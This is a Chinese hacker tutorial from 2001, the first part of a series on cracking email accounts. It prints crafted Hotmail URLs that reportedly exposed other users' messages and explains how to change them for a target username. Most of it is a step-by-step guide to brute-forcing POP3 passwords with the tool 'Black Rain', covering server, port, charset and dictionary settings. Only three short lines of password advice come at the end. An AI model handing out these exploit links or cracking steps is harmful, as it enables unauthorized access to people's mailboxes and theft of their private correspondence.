黑客起步之电子邮箱篇（一）

黑客起步之电子邮箱篇（一）


 
作者：小铭


 
小铭：电子邮箱是大家使用最多的东西。那么，它的安全性又如何呢？我们一起来探讨！

E-mail，也就是“电子邮箱”。它是网络联系的一个重要工具。

许多大公司大企业都需要电子邮箱来传送文件。其中，机密的文件就有很多。虽然，我们今天不是讨论怎样盗取这些机密文件。但我希望大家知道，一个脆弱的密码，它的危害性是多么的大！

破解邮箱密码最好、最常用的就是“穷举破解”。意思就是，不断地尝试密码，直到试出一个正确的密码。

当然，除了这个办法外，还有很多很多的办法。

例如：利用“忘记密码”的功能，刺探密码。

这方面的程序就有 ―― 嗍雪

它也属于“穷举破解”，只不过方法不一样。它破解的不是密码，而是生日。

还有：利用服务器漏洞。

有人会问：这么大型的网站怎么可能有漏洞呢？

世上没有一台主机是绝对安全的。邮件服务器也一样。

最近，微软属下的hotmail网站发现严重漏洞。此漏洞允许你浏览其他用户的E-mail！


只需三个步骤，你可以浏览其他用户的E-mail：


1、用你的普通ID（或者其他人的ID）登陆hotmail。


2、使用下面的链接以得到其他指定用户的特殊信息。

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com


或者：http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com


其中：

MSG943322803%2e16 （信笺内容的编号,，它仅仅是编号作用. %2e=.）

username　　　　　（你想浏览hotmail用户的ID）


（如果你不想浏览所有的正常email，而只是浏览邮件信箱,那么从上面的链接移去:\"%26raw%3d0\".）


（如果你不想让hotmail的广告或者信息出现在frame的上面,请移去:\"&hm___fl=attrd&domain=hotmail.com\".）


3、完成。

如果你输入了正确的用户名以及信笺编号,那么你就可以直接浏览了。：）


（请使用自己的hotmail信箱进行测试。）


hotmail已经得到通报并修正了该问题！

从此可以说明，再好的服务器也存在漏洞。

不过，今天我们只谈“POP3 穷举破解”。

“穷举破解”就是一个一个不断地试。如果一个3位数的纯数字密码，不用几分钟就可以破解出来。但，如果换一个15位的符号加数字的密码，可能要80年！

所以，“POP3 穷举破解”对于一些“笨蛋”用户是很有用的。

本次范例需要的系统及程序情况如下：

操作系统：Windows98

程序（一）：黑雨 ―― POP3邮箱密码探测器

本机IP：127.0.0.1

POP3服务器IP：127.0.0.7

POP3用户名：test

新程序说明：

“黑雨 ―― POP3邮箱密码探测器”是由黑客力量成员廖长科制作的。

主要功能概述：


验证用户名和密码是否正确。

独创 ―― 深度算法：这是一种很特殊的算法，如果你位数猜得准，就可以将时间缩短30%-70%。

独创 ―― 广度算法：此算法CPU占用比上面的兄弟多2%，速度快一点点点儿，但它是一种老实的算法，现大多数类似功能的程序都采用它，其对短小密码（3位以下）非常强！

独创 ―― 多线程深度算法：如果你是K7、P3一类的强列推荐，它理论上可以提高速度700%以上！！

此软件特色：

简单、易用

功能强大

独创多项算法

首先，我们打开“bkrain.exe”。

设置：

“Pop3地址”： 127.0.0.7（例如：www.163.net的pop3为：pop.163.net。）

“Pop3端口”：110

“Pop3用户名”：test

“密码位数”：5

接着，我们可以选择猜测的密码类型：

“选择字符集：”

这里可以选择密码的字符类型。例如，要猜测数字，就选择数字。

“自定字符集：”

如果，上面的字符类型都满足不了你。你可以在这里定义。

“字典文件：”

这里可以选择密码字典。

设置完毕后，我们就可以点击“深度算法”、“广度算法”或“多线程深度算法”开始猜测了。

如何防御POP3穷举破解？

方法很简单：

1、设置一个8位以上，字符加数字加标点的密码。

2、不要用单词作为密码。

3、经常更改密码。


                                                                         2001年8月23日